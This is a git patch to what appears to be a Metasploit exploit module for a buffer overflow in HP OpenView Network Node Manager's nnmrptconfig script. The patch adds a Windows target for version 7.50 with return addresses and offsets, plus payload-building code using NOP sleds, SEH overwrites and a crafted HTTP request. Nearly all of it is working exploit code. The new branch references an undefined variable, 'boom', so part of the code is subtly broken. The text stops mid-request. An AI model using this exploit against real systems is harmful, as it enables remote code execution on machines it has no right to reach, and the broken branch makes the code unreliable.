From a05866385fc66d5c9eb99992156266ac5c1b5e27 Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Thu, 24 Mar 2011 02:48:04 +0000 Subject: [PATCH] Added target 7.50, provided by MC git-svn-id: file:///home/svn/framework3/trunk@12122 4d416f70-5f16-0410-b530-b9f4589650da --- .../http/hp_nnm_nnmrptconfig_nameparams.rb | 79 +++++++++++++------ 1 file changed, 57 insertions(+), 22 deletions(-) diff --git a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb index c905fcf767..ef75ecd60c 100644 --- a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb +++ b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb @@ -31,6 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'sinn3r', + 'MC', ], 'References' => [ @@ -39,7 +40,8 @@ class Metasploit3 < Msf::Exploit::Remote ], 'Payload' => { - 'BadChars' => "\x00\x26\x2b", + 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", + 'StackAdjustment' => -3500, }, 'DefaultOptions' => { @@ -49,36 +51,69 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - ['Windows Server 2003 Enterprise', {'Ret'=>0x5A30532D, 'offset'=>46913, 'Pops'=>13, 'Payloadoffset'=>57} ], + [ + 'HP NNM 7.53 Windows Server 2003 Enterprise', + { + 'Ret' => 0x5A30532D, #POP/POP/RET OvWww.dll + 'offset' => 46913, #Offset to SEH chain + 'Pops' => 13, #Number of POPADs needed + 'Payloadoffset' => 57, #Offset to pyload + } + ], + [ + 'HP OpenView Network Node Manager 7.50', + { + 'Ret' => 0x5a01d78d, #JMP + 'offset' => 5117, #Offset to overwrite EIP + } + ], ], 'Privileged' => false, - 'DisclosureDate' => "JAN 10 2011")) + 'DisclosureDate' => "Jan 10 2011")) - register_options( - [ - Opt::RPORT(80), - ], self.class) + register_options( [Opt::RPORT(80),], self.class ) end def exploit - nops = make_nops(1000)*70 + sploit = '' + data = '' - sploit = nops[0, target['offset']] - sploit << generate_seh_record(target.ret) - sploit << "\x61"*target['Pops'] - sploit << "\x51" - sploit << "\xc3" - sploit << nops[0, target['Payloadoffset']] - sploit << payload.encoded - sploit << nops[0, 70000-sploit.length] + if target.name =~ /NNM 7.53/ && target.name =~ /Server 2003/ - data = "Content&Action=Create&" - data << "Template=Avail/CRAvail&" - data << "Operation=Apply&" - data << "Params=schdParams+nameParams" - data << "&schdParams=schd_select1%3Ddaily%7Cmonthtodate&" - data << "nameParams=text1%3D#{sploit}%26text2%3Dtest2test%26text3%3Dtest2 HTTP/1.1" + nops = make_nops(1000)*70 + + sploit << nops[0, target['offset']] + sploit << generate_seh_record(target.ret) + sploit << "\x61"*target['Pops'] + sploit << "\x51" + sploit << "\xc3" + sploit << nops[0, target['Payloadoffset']] + sploit << payload.encoded + sploit << nops[0, 70000-sploit.length] + + data << "Content&Action=Create&" + data << "Template=Avail/CRAvail&" + data << "Operation=Apply&" + data << "Params=schdParams+nameParams" + data << "&schdParams=schd_select1%3Ddaily%7Cmonthtodate&" + data << "nameParams=text1%3D#{sploit}%26text2%3Dtest2test%26text3%3Dtest2 HTTP/1.1" + + elsif target.name =~ /7.50/ + + #Courtersy of MC + sploit << rand_text_alpha_upper(target['offset']) + sploit << [target.ret].pack('V') + sploit << payload.encoded + sploit << rand_text_alpha_upper(8024 - 5117 - 4 - payload.encoded.length) + + data << "Content&Action=Modify&Template=Avail/General+Availabiilty/monthtodat" + data << "e&Operation=Apply&Params=schdParams+nameParams&schdParams=schd_select1%3Dmonto" + data << "date&nameParams=text1%3D#{boom}%262%3D%263%3D" + + end + + print_status("Trying target #{target.name}...") connect send_request_raw({